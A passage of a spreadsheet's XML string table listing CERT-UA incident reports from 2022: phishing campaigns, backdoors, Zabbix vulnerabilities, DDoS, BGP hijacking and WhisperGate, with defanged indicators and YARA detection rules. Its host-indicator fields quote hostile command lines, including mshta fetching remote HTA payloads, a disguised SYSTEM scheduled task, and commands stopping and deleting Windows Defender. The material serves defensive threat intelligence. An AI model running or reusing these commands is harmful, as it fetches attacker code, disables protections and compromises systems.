            //   8b75ec               | mov                 esi, dword ptr [ebp - 0x14]
        $sequence_14 = { 83f8ff 7446 0fb70d???????? 51 50 }
            // n = 5, score = 100
            //   83f8ff               | cmp                 eax, -1
            //   7446                 | je                  0x48
            //   0fb70d????????       |                     
            //   51                   | push                ecx
            //   50                   | push                eax
        $sequence_15 = { 7e35 0f1f8000000000 448bc7 4863c3 }
            // n = 4, score = 100
            //   7e35                 | dec                 eax
            //   0f1f8000000000       | mov                 ebx, ecx
            //   448bc7               | dec                 eax
            //   4863c3               | test                ecx, ecx
    condition:
        7 of them and filesize &lt; 123904
}</t>
  </si>
  <si>
    <t>Виявлено файл "довідка.zip", який містить файл контекстної довідки (Microsoft Compiled HTML Help) "dovidka.chm". Згаданий CHM-файл, у свою чергу, містить зображення-приманку "image.jpg" (довідка про порядок дій під част артилерійських обстрілів) та HTA-файл "file.htm" зі шкідливим програмним кодом на мові VBScript. Виконання останнього призведе до створення на комп'ютері і запуску дропера "ignit.vbs", який забезпечить декодування .NET-лоадеру "core.dll", а також файлів "desktop.ini" (виконує запуск "core.dll" за допомогою regasm.exe) і "Windows Prefetch.lNk", який забезпечує запуск раніше згаданого "desktop.ini" за допомогою wscript.exe.
Насамкінець, .NET-лоадер здійснить декодування і виконання шкідливої програми MicroBackdoor. Зауважимо, що дати компіляції бекдору та лоадеру - 28.01.2022 і 31.01.2022, відповідно; крім того, домен, що використовується сервером управління, створено 12.01.2022. Слід додати, що окрім стандартних команд ("id", "info", "ping", "exit", "upd", "uninst", "exec", "shell", "flist", "fget", "fput"), в цій версії бекдору додатково реалізовано команду "screenshot".</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37626</t>
  </si>
  <si>
    <t>unsafe storage of the client's session,bypass authentication in Zabbix with configured SAML</t>
  </si>
  <si>
    <t>Vulnerability</t>
  </si>
  <si>
    <t>"09.01"</t>
  </si>
  <si>
    <t>Modified session data, Gained administrator access</t>
  </si>
  <si>
    <t>Звертаємо увагу на критичні вразливості в Zabbix (CVE-2022-23131, CVE-2022-23134), які активно експлуатуються зловмисниками, для отрмання несанкціонованого доступу до Zabbix.
Вразливість CVE-2022-23131 має рівень важливості 9,1 та пов’язана з небезпечним зберіганням сеансу клієнта, що призводить до обходу автентифікації в Zabbix з налаштованим SAML.
У випадку увімкненої (не за замовчуванням) автентифікації  SAML SSO, дані сеансу можуть бути змінені зловмисником, так як логін користувача, що зберігається в сеансі, не перевіряється. Це дає змогу зловмисникові, який не пройшов перевірку, використати дану вразливість для підвищення привілеїв та отримання доступу адміністратора до  Zabbix Frontend.
Для здійснення такої атаки необхідно увімкнути автентифікацію SAML та знати ім’я користувача Zabbix.
Обидві вразливості були виправлені у версіях 6.0.0beta2, 5.4.9, 5.0.19, та 4.0.37.
Рекомендуємо негайно оновити Zabbix до цих версій.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37287</t>
  </si>
  <si>
    <t>Acquainted</t>
  </si>
  <si>
    <t>CVE-2022-23131</t>
  </si>
  <si>
    <t>CWE-290</t>
  </si>
  <si>
    <t>9,1</t>
  </si>
  <si>
    <t>Gained access to some methods of the setup.php file,Changed configuration</t>
  </si>
  <si>
    <t>Звертаємо увагу на критичні вразливості в Zabbix (CVE-2022-23131, CVE-2022-23134), які активно експлуатуються зловмисниками, для отрмання несанкціонованого доступу до Zabbix.
Друга вразливість CVE-2022-23134 оцінюється як середнього ступеня небезпеки і дозволяє отримати доступ до деяких методів файлу setup.php не тільки супер-адміністраторам, а й неавтентифікованим користувачам. Це дає змогу зловмисникові пройти перевірку і змінити конфігурацію Zabbix.
Обидві вразливості були виправлені у версіях 6.0.0beta2, 5.4.9, 5.0.19, та 4.0.37.
Рекомендуємо негайно оновити Zabbix до цих версій.</t>
  </si>
  <si>
    <t>CVE-2022-23134</t>
  </si>
  <si>
    <t>CWE-863, CWE-284</t>
  </si>
  <si>
    <t>3,7</t>
  </si>
  <si>
    <t>CERT-UA#3967</t>
  </si>
  <si>
    <t>Buhtrap (UAC-0008);Russia APT</t>
  </si>
  <si>
    <t>Coworkers' computers</t>
  </si>
  <si>
    <t>Hidden macros, SourSnack, LightRope, LiteManager</t>
  </si>
  <si>
    <t>exe, xls</t>
  </si>
  <si>
    <t>Malware infection, System compromise</t>
  </si>
  <si>
    <t>"02.01", "05.02"</t>
  </si>
  <si>
    <t>Remote control of the device</t>
  </si>
  <si>
    <t>hxxps://mail.nais-gov[.]org/2021-07-30-08-55-07.xlsm	
	widget.forum-pokemon[.]com
	ns.ns2-dns[.]com
	ns.ns3-dns[.]com
	ns3-dns[.]com
	ns2-dns[.]com
	cs1.wpc-v0cdn[.]org
	wpc-v0cdn[.]org
	ipv6-wpnc[.]net
	alt-2cdn[.]net
	nais-gov[.]org
	nais-gov[.]com
	91[.]240.86.200
	89[.]108.101.61
	45[.]76.85.232
	185[.]162.9.218
	95[.]179.135.36
	91[.]240.86.200:5651</t>
  </si>
  <si>
    <t>Mikael LLC (administrator@mikael-company[.]ru)
	George Alan Developments Incorporated
	C:\windows\system32\wbem\wmic.exe process where ExecutablePath='C:\\ProgramData\\lsass.exe' delete
	C:\windows\system32\wbem\wmic.exe process where ExecutablePath='C:\\ProgramData\\svchost.exe' delete
	C:\windows\system32\schtasks.exe /delete /tn "Network Security Update" /f
	C:\windows\system32\schtasks.exe /create /sc onstart /tn "Network Security Update" /tr "C:\ProgramData\lsass.exe" /ru SYSTEM
	%PROGRAMDATA%\lsass.exe
	%PROGRAMDATA%\svchost.exe
	%PROGRAMDATA%\config.xml
	%PUBLIC%\output.exe
	%APPDATA%\dnsoption.exe
	%APPDATA%\Microsoft\Windows\CDSSyncReporting.exe</t>
  </si>
  <si>
    <t>Від одного з суб’єктів координації отримано інформацію про виявлення потенційно шкідливих програм на комп’ютерах співробітників.
За результатами проведеного аналізу встановлено, що надані об’єкти дослідження містять ознаки шкідливих програм, класифікованих як LightRope та LiteManager. Подальша кореляція індикаторів компрометації, а також тактик, технік та процедур</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37246</t>
  </si>
  <si>
    <t>Not yet known;Unknown</t>
  </si>
  <si>
    <t>broken Mikrotik routers, ACL, Botnet Mirai, Botnet Meris</t>
  </si>
  <si>
    <t>Проведення розподілених атак на відмову в обслуговуванні (DDoS) у відношенні веб-ресурсів українських банків та державних установ. В рамках дослідження, в тому числі, з урахуванням інформації від партнерів, визначено, що до здійснення атак, серед іншого, залучено бот-мережі Mirai (https://twitter.com/360Netlab/status/1493797519725367302) та Meris (шкідливий інформаційний потік спрямовується через тисячі зламаних маршрутизаторів Mikrotik та ряду інших IoT пристроїв з фільтрацією джерел за допомогою ACL, що дозволяє приховати згадані пристрої від пошукових систем на кшталт Shodan). Зазначене, з високим рівнем впевненості, дозволяє припустити, що для проведення атак використано наявні потужності зловмисників, що надаються як послуга (DDoS as a Service).
У зв’язку з тим, що кількість подібних пристроїв налічує більше 30000, список IP-адрес розповсюджено серед суб’єктів координації за допомогою платформи MISP.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37139</t>
  </si>
  <si>
    <t>Унеможливлення доступу до веб-ресурів в зоні gov.ua шляхом здійснення DDoS-атаки на обслуговуючі DNS-сервери (https://hostmaster.ua/news/?pr20220216). Виведення з ладу декількох серверів доменних імен призвело до тимчасового порушення доступу до значної кількості веб-ресурсів державних органів у зв’язку з неможливістю визначення A-запису (IP-адреси) для відповідних доменних імен.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37140</t>
  </si>
  <si>
    <t>PRIVATBANK</t>
  </si>
  <si>
    <t>BGP Hijacking Attack</t>
  </si>
  <si>
    <t>Sniffing</t>
  </si>
  <si>
    <t>"03.02"</t>
  </si>
  <si>
    <t>Stolen traffic packets</t>
  </si>
  <si>
    <t>217.117.7.0/24
16284 (Inq-Digital-Nigeria-AS, NG)</t>
  </si>
  <si>
    <t>Підозріла маніпуляція з налаштуваннями автономних систем на рівні протоколу BGP. Так, за даними Cisco Crosswork (http://bgpstream.com/event/287011) протягом більше ніж двох годин, починаючи з 15:30 15.02.2022, префікс 217.117.7.0/24, який фактично належить Inq-Digital-Nigeria-AS (AS16284), було анонсовано від імені автономної системи Приватбанку (AS15742) через автономну систему нігерійського оператора телекомунікацій AS37148.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/37141</t>
  </si>
  <si>
    <t>CERT-UA#4634,4648</t>
  </si>
  <si>
    <t>Акція, Помста, Херсон; ua</t>
  </si>
  <si>
    <t>lnk shortcut, NTA-file, GammaLoad</t>
  </si>
  <si>
    <t>htm, rar, lnk, xml, txt, php</t>
  </si>
  <si>
    <t>Screenshot</t>
  </si>
  <si>
    <t>sendmail[.]website
a0671524.xsph[.]ru
a0667987.xsph[.]ru
qiwardos[.]ru
nitikora[.]ru
milotraf[.]ru
nikotod[.]ru
military-ukraine@sendmail.website
coyote@sendmail.website
194[.]58.121.198 (Received)
92[.]53.116.145 (Received)
216[.]128.131.233
66[.]42.95.123
hXXp://qiwardos[.]ru/get.php
hXXp://qiwardos[.]ru/index.php
hXXp://a0671524.xsph[.]ru/mo/faicon.ico
hXXp://a0671524.xsph[.]ru/bandage/precarious.xml
hXXp://a0667987.xsph[.]ru/zsu/faicon.ico
hXXp://a0667987.xsph[.]ru/preparations/rejection.xml
hXXps://icanhazip[.]com (Легітимний сервіс)</t>
  </si>
  <si>
    <t>%WINDIR%\System32\mshta.exe http://a0671524.xsph.ru/bandage/precarious.xml /f
%WINDIR%\System32\mshta.exe http://a0667987.xsph.ru/preparations/rejection.xml /f
cmd.exe /c wscript.exe %USERPROFILE%\desktop.txt //b //e:VBScript
%USERPROFILE%\desktop.txt</t>
  </si>
  <si>
    <t>Отримано інформацію про факт розсилання електронних листів з темою "Щодо проведення акції помсти у Херсоні!", що містять вкладення у вигляді файлу "План Херсон.htm".
HTM-файл забезпечить декодування і створення на комп'ютері жертви файлу "Herson.rar", який містить файл-ярлик "План підходу та закладання вибухівки на об'єктах критичної інфростурктури Херсона.lnk".
Згаданий LNK-файл у разі його вікдриття забезпечить завантаження і запуск HTA-файлу "precarious.xml", що призведе до створення та виконання файлів "desktop.txt" і "user.txt".
В результаті, на комп'ютер буде завантажено шкідливу програму GammaLoad.PS1_v2 (імплементовано механізм виготовлення знімку екрану та його відправки на сервер управління)</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/40240</t>
  </si>
  <si>
    <t>CERT-UA#3799</t>
  </si>
  <si>
    <t>Повідомлення, Злочин, Білоус Олексій Сергійович; ua</t>
  </si>
  <si>
    <t>JavaScript, PowerShell, Discord,OutSteel, HTTP POST</t>
  </si>
  <si>
    <t>doc, js, exe</t>
  </si>
  <si>
    <t>hxxps://cdn.discordapp[.]com/attachments/932413459872747544/938291977735266344/putty.exe 
hxxps://cdn.discordapp[.]com/attachments/932413459872747544/938317934026170408/puttyjejfrwu.exe 
hxxp://185.244.41[.]109:8080/upld/ 
hxxp://eumr[.]site/load74h74830.exe 
185.244.41[.]109 
eumr[.]site 
mariaparsons10811@gmail[.]com</t>
  </si>
  <si>
    <t xml:space="preserve">%PUBLIC%\GoogleChromeUpdate.exe 
%USERPROFILE%\Documents\.exe 
%TEMP%\GSU207@POLICE.GOV.UA - Повідомлення (2).js 
%TEMP%\rmm.bat 
%TEMP%\svjhost.exe </t>
  </si>
  <si>
    <t xml:space="preserve">Від суб’єкту координації отримано інформацію щодо розповсюдження, начебто, від імені Національної поліції України, електронних листів, із вкладеннями у вигляді захищених паролем DOCX-документів, наприклад «Повідомлення про вчинення злочину (Білоус Олексій Сергійович).docx» або «Повідомлення про вчинення злочину.docx». 
Згадані документи містять вбудовані об’єкти, активація яких призведе до створення і запуску на комп’ютері Javascript-файлу, наприклад «GSU207@POLICE.GOV.UA - Повідомлення (2).js». Останній, за допомогою powershell здійснить підключення до сервісу Discord та завантажить і виконає EXE-файл, що призведе до ураження комп’ютера жертви шкідливою програмою OutSteel (дата компіляції: 30.01.2022) . </t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/18419</t>
  </si>
  <si>
    <t>CERT-UA#3787</t>
  </si>
  <si>
    <t>Судна, Іноземні, Порт, Крим; ua</t>
  </si>
  <si>
    <t xml:space="preserve">Hidden macros, VBA-code, GammaLoad </t>
  </si>
  <si>
    <t>rar, doc, gif</t>
  </si>
  <si>
    <t xml:space="preserve">hxxp://surname192.temp.swtest[.]ru/prapor/su/derg.gif 
hxxp://surname192.temp.swtest[.]ru/prapor/su/ino.gif 
hxxp://&lt;IP-адреса&gt;/concession.mot 
surname192.temp.swtest[.]ru 
coagula[.]online 
tortunas[.]ru 
phymateus[.]online 
stopcovid@email[.]cz </t>
  </si>
  <si>
    <t>%USERPROFILE%\Downloads\&lt;назва_файлу&gt;.exe</t>
  </si>
  <si>
    <t xml:space="preserve">Від суб’єкту координації (Кіберцентр Державної прикордонної служби України) отримано інформацію щодо розповсюдження, начебто, від імені ДП «Адміністрація морських портів України», електронних поштових повідомлень із вкладенням у вигляді RAR-архіву «порти АРК.rar». 
Згаданий RAR-архів містить шкідливі DOCX-документи «Щодо заходження суден під іноземним прапором в порти АР Крим на 27.01.2022.docx» і «Щодо заходження суден під державним прапором в порти АР Крим на 27.01.2022.docx», кожен з яких, у свою чергу, містить вбудовану URL-адресу. 
У разі відкриття документів буде завантажено і відкрито DOC-файл з макросом. Останній забезпечить виконання шкідливого VBA-коду, що призведе до ураження комп’ютера шкідливою програмою GammaLoad. </t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/18365</t>
  </si>
  <si>
    <t>CERT-UA#3785</t>
  </si>
  <si>
    <t>Discord, PowerShell, OutSteel, SaintBot, HTTP POST</t>
  </si>
  <si>
    <t>hxxps://cdn.discordapp[.]com/attachments/908281957039869965/937420906286952568/d5aadb4ace8ffccb.zip 
hxxp://eumr[.]site/up74987340.exe 
hxxp://eumr[.]site/load74h74830.exe 
hxxp://185.244.41[.]109:8080/upld/ 
hxxp://8003659902[.]space/wp-adm/gate.php 
hxxp://smm2021[.]net/wp-adm/gate.php 
hxxp://8003659902[.]site/wp-adm/gate.php 
eumr[.]site 
8003659902[.]space 
smm2021[.]net 
8003659902[.]site 
1000020[.]xyz 
185.244.41[.]109 
testsid@lthhc-zm[.]com</t>
  </si>
  <si>
    <t xml:space="preserve">%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\&lt;назва_файлу&gt;.exe 
%TEMP%\rmm.bat 
%TEMP%\svjhost.exe 
%LOCALAPPDATA%\zz%USER%\ </t>
  </si>
  <si>
    <t>rule win_saint_bot_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.saint_bot."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot"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8d45e0 6800800000 50 8d45f8 50 57 ff15???????? }
            // n = 7, score = 100
            //   8d45e0               | lea                 eax, dword ptr [ebp - 0x20]
            //   6800800000           | push                0x8000
            //   50                   | push                eax
            //   8d45f8               | lea                 eax, dword ptr [ebp - 8]
            //   50                   | push                eax
            //   57                   | push                edi
            //   ff15????????         |                     
        $sequence_1 = { 50 ff75f8 56 ff75ec ff15???????? ff75ec ff15???????? }
            // n = 7, score = 100
            //   50                   | push                eax
            //   ff75f8               | push                dword ptr [ebp - 8]
            //   56                   | push                esi
            //   ff75ec               | push                dword ptr [ebp - 0x14]
            //   ff15????????         |                     
            //   ff75ec               | push                dword ptr [ebp - 0x14]
            //   ff15????????         |                     
        $sequence_2 = { 8bec 56 8b750c 57 85f6 7434 }
            // n = 6, score = 100
            //   8bec                 | mov                 ebp, esp
            //   56                   | push                esi
            //   8b750c               | mov                 esi, dword ptr [ebp + 0xc]
            //   57                   | push                edi
            //   85f6                 | test                esi, esi
            //   7434                 | je                  0x36
        $sequence_3 = { 8bf0 8d4e01 51 57 ff15???????? 8bf8 33c0 }
            // n = 7, score = 100
            //   8bf0                 | mov                 esi, eax
            //   8d4e01               | lea                 ecx, dword ptr [esi + 1]
            //   51                   | push                ecx
            //   57                   | push                edi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax
            //   33c0                 | xor                 eax, eax
        $sequence_4 = { 0fb64ffe 8d043a c1e108 3bc6 7308 0fb647ff 0bc1 }
            // n = 7, score = 100
            //   0fb64ffe             | movzx               ecx, byte ptr [edi - 2]
            //   8d043a               | lea                 eax, dword ptr [edx + edi]
            //   c1e108               | shl                 ecx, 8
            //   3bc6                 | cmp                 eax, esi
            //   7308                 | jae                 0xa
            //   0fb647ff             | movzx               eax, byte ptr [edi - 1]
            //   0bc1                 | or                  eax, ecx
        $sequence_5 = { 8d7b34 57 ff75d8 ff15???????? 85c0 790f ff75dc }
            // n = 7, score = 100
            //   8d7b34               | lea                 edi, dword ptr [ebx + 0x34]
            //   57                   | push                edi
            //   ff75d8               | push                dword ptr [ebp - 0x28]
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   790f                 | jns                 0x11
            //   ff75dc               | push                dword ptr [ebp - 0x24]
        $sequence_6 = { ff15???????? ebbb 55 8bec 53 56 57 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   ebbb                 | jmp                 0xffffffbd
            //   55                   | push                ebp
            //   8bec                 | mov                 ebp, esp
            //   53                   | push                ebx
            //   56                   | push                esi
            //   57                   | push                edi
        $sequence_7 = { ab 6a04 ab ab }
            // n = 4, score = 100
            //   ab                   | stosd               dword ptr es:[edi], eax
            //   6a04                 | push                4
            //   ab                   | stosd               dword ptr es:[edi], eax
            //   ab                   | stosd               dword ptr es:[edi], eax
        $sequence_8 = { 8945fc 85d2 744f 8b5508 0fb70442 663b450c }
            // n = 6, score = 100
            //   8945fc               | mov                 dword ptr [ebp - 4], eax
            //   85d2                 | test                edx, edx
            //   744f                 | je                  0x51
            //   8b5508               | mov                 edx, dword ptr [ebp + 8]
            //   0fb70442             | movzx               eax, word ptr [edx + eax*2]
            //   663b450c             | cmp                 ax, word ptr [ebp + 0xc]
        $sequence_9 = { 46 e9???????? 8b07 8b7d08 56 ff7354 8945f0 }
            // n = 7, score = 100
            //   46                   | inc                 esi
            //   e9????????           |                     
            //   8b07                 | mov                 eax, dword ptr [edi]
            //   8b7d08               | mov                 edi, dword ptr [ebp + 8]
            //   56                   | push                esi
            //   ff7354               | push                dword ptr [ebx + 0x54]
            //   8945f0               | mov                 dword ptr [ebp - 0x10], eax
    condition:
        7 of them and filesize &lt; 93184
}</t>
  </si>
  <si>
    <t>Отримано інформацію щодо розповсюдження, начебто, від імені Національної служби здоров’я України, електронних поштових повідомлень, що містили посилання на ZIP-архів, розміщений на публічному сервісі Discord. 
Згаданий ZIP-архів містить документ-приманку та два ідентичні файли-ярлики, у випадку відкриття яких на комп’ютері жертви буде виконано powershell-команду, що, в свою чергу, призведе до завантаження і запуску шкідливої програми OutSteel (дата компіляції: 28.01.2022). Остання забезпечить пошук та викрадення документів на комп’ютері жертви, а також завантажить і виконає шкідливу програму SaintBot (дата компіляції: 30.04.2021)</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/18273</t>
  </si>
  <si>
    <t>CERT-UA#3751</t>
  </si>
  <si>
    <t>UAC-0096;Unknown</t>
  </si>
  <si>
    <t>Суд, Запит; ua</t>
  </si>
  <si>
    <t>Remote Utilities, RManService</t>
  </si>
  <si>
    <t>zip, rar, exe</t>
  </si>
  <si>
    <t>Malware distribution, Phishing, System compromise</t>
  </si>
  <si>
    <t>"02.02", "03.03", "05.02"</t>
  </si>
  <si>
    <t>101.99.93[.]49
rmssrv2[.]ru
rmssrv3[.]ru
rmssrv4[.]ru</t>
  </si>
  <si>
    <t>HKLM\SYSTEM\ControlSet001\services\RManService
HKLM\SOFTWARE\Usoris\Remote Utilities Host\
%PROGRAMFILES(X86)%\Remote Utilities - Host\</t>
  </si>
  <si>
    <t>Зафіксовано факт масового розповсюдження електронних поштових повідомлень, що містять посилання на захищені паролем RAR і/або ZIP архіви (наприклад, «Судовий запит №9978364774635676778282.rar_pass_123.zip»), розміщені на публічних сервісах Google Drive і DropMeFiles.
У разі завантаження, розпакування і запуску вмісту архіву на комп’ютер жертви буде встановлено легітимну програму Remote Utilities, що надасть прихований віддалений доступ до пристрою третім особам. Персистентність програми (здатність поновлювати активність після перезавантаження комп’ютера) забезпечується шляхом створення служби «RManService».</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/18163</t>
  </si>
  <si>
    <t>web resources of Ukraine, web page visitors</t>
  </si>
  <si>
    <t>BootPatch, WhisperKill, WhisperGate,WhisperPack, Eazfuscator, AdvancedRun.exe (NirSoft), VBScript, supply chain, OctoberCMS, Log4j, deface</t>
  </si>
  <si>
    <t>exe</t>
  </si>
  <si>
    <t>System compromise, Vulnerability, Unauthorised modification of information</t>
  </si>
  <si>
    <t>"05.02", "09.01", "07.02"</t>
  </si>
  <si>
    <t>Modified data, Deleted data</t>
  </si>
  <si>
    <t>hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
hxxp://179.43.176[.]42:8000/index.php
hxxp://179.43.176[.]38:8000/index.php
179.43.176[.]42
179.43.176[.]38
179.43.176[.]60
179.43.176.0/24</t>
  </si>
  <si>
    <t>cmd.exe /Q /c start c:\stage1.exe 1&gt; \\127.0.0.1\ADMIN$\__%TIMESTAMP% 2&gt;&amp;1
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
"%TMP%\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse 
POST /backend/backend/auth/signin
POST /backend/backend
POST /backend/backend/auth/restore
POST /backend/backend/auth/reset/1/1
POST /backend/system/settings/update/october/backend/editor
POST /backend/backend/pages/create</t>
  </si>
  <si>
    <t>rule win_whispergate_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.whispergate."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate"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8b55b4 0fb6440c0b 3c2f 7426 3c5c 7422 89c8 }
            // n = 7, score = 300
            //   8b55b4               | mov                 edx, dword ptr [ebp - 0x4c]
            //   0fb6440c0b           | movzx               eax, byte ptr [esp + ecx + 0xb]
            //   3c2f                 | cmp                 al, 0x2f
            //   7426                 | je                  0x28
            //   3c5c                 | cmp                 al, 0x5c
            //   7422                 | je                  0x24
            //   89c8                 | mov                 eax, ecx
        $sequence_1 = { 0fbeda 83fb5d 8d7701 0f841a010000 }
            // n = 4, score = 300
            //   0fbeda               | movsx               ebx, dl
            //   83fb5d               | cmp                 ebx, 0x5d
            //   8d7701               | lea                 esi, dword ptr [edi + 1]
            //   0f841a010000         | je                  0x120
        $sequence_2 = { 0f8543010000 83c30c 81fb???????? 0f8389000000 8b13 }
            // n = 5, score = 300
            //   0f8543010000         | jne                 0x149
            //   83c30c               | add                 ebx, 0xc
            //   81fb????????         |                     
            //   0f8389000000         | jae                 0x8f
            //   8b13                 | mov                 edx, dword ptr [ebx]
        $sequence_3 = { a1???????? 890424 e8???????? e8???????? a1???????? }
            // n = 5, score = 300
            //   a1????????           |                     
            //   890424               | mov                 dword ptr [esp], eax
            //   e8????????           |                     
            //   e8????????           |                     
            //   a1????????           |                     
        $sequence_4 = { 5b 5e 5f 5d c3 0fbe57ff 85d2 }
            // n = 7, score = 300
            //   5b                   | pop                 ebx
            //   5e                   | pop                 esi
            //   5f                   | pop                 edi
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   0fbe57ff             | movsx               edx, byte ptr [edi - 1]
            //   85d2                 | test                edx, edx
        $sequence_5 = { 740e 0fb75002 89c6 8d4802 6685d2 75ca 3975e4 }
            // n = 7, score = 300
            //   740e                 | je                  0x10
            //   0fb75002             | movzx               edx, word ptr [eax + 2]
            //   89c6                 | mov                 esi, eax
            //   8d4802               | lea                 ecx, dword ptr [eax + 2]
            //   6685d2               | test                dx, dx
            //   75ca                 | jne                 0xffffffcc
            //   3975e4               | cmp                 dword ptr [ebp - 0x1c], esi
        $sequence_6 = { 89f8 eb85 8b45d4 89e6 890424 e8???????? 83c010 }
            // n = 7, score = 300
            //   89f8                 | mov                 eax, edi
            //   eb85                 | jmp                 0xffffff87
            //   8b45d4               | mov                 eax, dword ptr [ebp - 0x2c]
            //   89e6                 | mov                 esi, esp
            //   890424               | mov                 dword ptr [esp], eax
            //   e8????????           |                     
            //   83c010               | add                 eax, 0x10
        $sequence_7 = { 894c2414 0fb608 0f8437010000 8b442414 }
            // n = 4, score = 300
            //   894c2414             | mov                 dword ptr [esp + 0x14], ecx
            //   0fb608               | movzx               ecx, byte ptr [eax]
            //   0f8437010000         | je                  0x13d
            //   8b442414             | mov                 eax, dword ptr [esp + 0x14]
        $sequence_8 = { f7c280800000 0f840a010000 89d1 00d1 }
            // n = 4, score = 300
            //   f7c280800000         | test                edx, 0x8080
            //   0f840a010000         | je                  0x110
            //   89d1                 | mov                 ecx, edx
            //   00d1                 | add                 cl, dl
        $sequence_9 = { 8b45bc 8b4004 83c304 890424 }
            // n = 4, score = 300
            //   8b45bc               | mov                 eax, dword ptr [ebp - 0x44]
            //   8b4004               | mov                 eax, dword ptr [eax + 4]
            //   83c304               | add                 ebx, 4
            //   890424               | mov                 dword ptr [esp], eax
    condition:
        7 of them and filesize &lt; 114688
}</t>
  </si>
  <si>
    <t>У ніч з 13 на 14 січня 2022 року здійснено втручання в роботу вебсайтів низки державних організацій, в результаті чого при відвідуванні інформаційних ресурсів користувачеві відображалось зображення провокативного змісту.
У деяких випадках з метою порушення штатного режиму функціонування інформаційно-телекомунікаційних (автоматизованих) систем на завершальному етапі кібератаки зловмисниками було здійснено шифрування або видалення даних. Для цього застосовано щонайменше два різновиди шкідливих програм деструктивного характеру, а саме: BootPatch (запис шкідливого коду в MBR жорсткого диску з метою його незворотної модифікації) і WhisperKill (перезапис файлів за визначеним переліком розширень послідовністю байт 0xCC довжиною 1МБ), або видалення даних здійснювалося шляхом ручного видалення віртуальних машин.
Найбільш вірогідним вектором реалізації кібератаки є компрометація ланцюга постачальників (supply chain), що дозволило використати наявні довірчі зв’язки для виведення з ладу пов’язаних інформаційно-телекомунікаційних та автоматизованих систем. Водночас не відкидаються ще два можливих вектори атаки, а саме – експлуатація вразливостей OctoberCMS та Log4j.
Урядова команда реагування на комп’ютерні надзвичайні події України CERT-UA вжила заходів зі збору цифрових доказів, вивчення зразків шкідливих програм і проведення комп’ютерно-технічних досліджень, в тому числі – відновлення інформації після її навмисного знищення. Наразі триває аналіз даних та дослідження обставин кіберінцидентів.
За наявними даними, згадана кібератака планувалася заздалегідь і проводилася у кілька етапів, в т. ч. із застосуванням елементів провокації.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/18101</t>
  </si>
  <si>
    <t>CVE-2021-32648; CVE-2021-44228</t>
  </si>
  <si>
    <t>CWE-640; CWE-502, CWE-400, CWE-20</t>
  </si>
  <si>
    <t>6,4; 10,0</t>
  </si>
  <si>
    <t>Microsoft products users</t>
  </si>
  <si>
    <t>HTTP Protocol Stack (http.sys)</t>
  </si>
  <si>
    <t>RCE</t>
  </si>
  <si>
    <t>Як показує практика, не оновлене вчасно програмне забезпечення і не усунуті вразливості можуть призводити до істотних негативних наслідків. Урядова команда реагування на комп'ютерні надзвичайні події України CERT-UA продовжує інформування про критичні вразливості програмного забезпечення.
Компанія Microsoft опублікувала інформацію про вразливість CVE-2022-21907, використання якої дозволяє зловмисникам здійснити віддалене виконання коду на вразливому хості. 
Ця вразливість стосується файлу HTTP Protocol Stack (http.sys), який використовується для прослуховування HTTP-запитів на серверах IIS (Internet Information Services). Надсилання спеціально створеного пакета дозволяє віддалено виконувати код неавтентифікованими користувачами. 
За замовчуванням Windows Server 2019 і Windows 10 версії 1809 не є вразливими, якщо вимкнена підтримка HTTP Trailer через значення реєстру EnableTrailerSupport.
Для зменшення впливу вразливості на Windows Server 2019 та Windows 10 версії 1809 рекомендовано видалити значення DWORD реєстру 'EnableTrailerSupport', якщо воно є в: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/17961</t>
  </si>
  <si>
    <t>CVE-2022-21907</t>
  </si>
  <si>
    <t>10,0</t>
  </si>
  <si>
    <t>Ukrainians</t>
  </si>
  <si>
    <t>Опитування, Виплата; ua</t>
  </si>
  <si>
    <t>CloudFlare</t>
  </si>
  <si>
    <t>Phishing, Fraudulent site</t>
  </si>
  <si>
    <t>"03.03", "08.01"</t>
  </si>
  <si>
    <t>airmauritiusticket.com
gangbang6.monster
great-surveys.top
accept-pay.top</t>
  </si>
  <si>
    <t>Виявлено шахрайські дії з викрадення даних платіжних карток громадян України</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/14624</t>
  </si>
  <si>
    <t>web page visitors</t>
  </si>
  <si>
    <t>Офіційно, Інтернет, Представництво, Президент України; ua</t>
  </si>
  <si>
